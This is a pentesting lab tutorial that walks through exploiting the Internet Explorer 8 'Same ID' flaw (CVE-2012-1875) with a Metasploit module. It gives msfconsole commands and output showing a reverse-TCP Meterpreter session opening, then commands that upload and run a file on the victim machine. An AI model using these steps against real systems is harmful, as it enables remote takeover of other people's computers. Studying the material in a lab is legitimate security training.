Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka “Same ID Property Remote Code Execution Vulnerability.“
Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).
DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)
ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().
But DEP and ASLR don’t make remote code execution attacks impossible -just trickier.
In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL – one which was compiled before ASLR become the norm, and
therefore doesn’t support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.
And DEP is bypassed using a technique known as ROP, or return-oriented programming.
Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ):
- Target OS: XP3
- Attacker OS : Backtrack or any PenTesting Distros
As usual , you have to create two VMs in your VirtualBox.
Preparing victim system:
Install the XP3 in one of the VM. Change the VM’s Network adapter to the Host-only-adapter. (if you don’t know what i am talking about, then please use this Virtualbox manual)
Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
Or you can download the ‘ms12_037_same_id.rb‘ module and paste in this directory “/opt/metasploit/msf3/modules/exploits/windows/browser/“
Configuring settings for the exploit in Metasploit:
Open the Terminal and type “msfconsole” to get the Metasploit console.
Type ” use exploit/windows/browser/ms12_037_same_id” in the console.
Now we have to know the list of settings available for this exploit module. In order to get the list , you can type “show options” in the console.
Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the “ifconfig” in the terminal.
Command: set URIPATH /
Details: The path in which our exploit will run.
As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
Ok, let us launch the exploit.
Type “exploit” in the console.
Now the exploit is started. Our exploit is running at “http://192.168.56.10:8080/”.
Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:
[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)
Type “sessions” to list the active sessions . Type “sessions -i 1”, this will open the connection to the session with the id ‘1’ and bring you to Meterpreter.
Now , You can control the victim system from computer using meterpreter.
‘upload /Test.exe c:\”, this command will upload the Test.exe from the root(‘file system’ dir) folder of the BT5 to the C drive of the Target.
‘execute -f C:\Test.exe”, this command will run our uploaded File in the Target.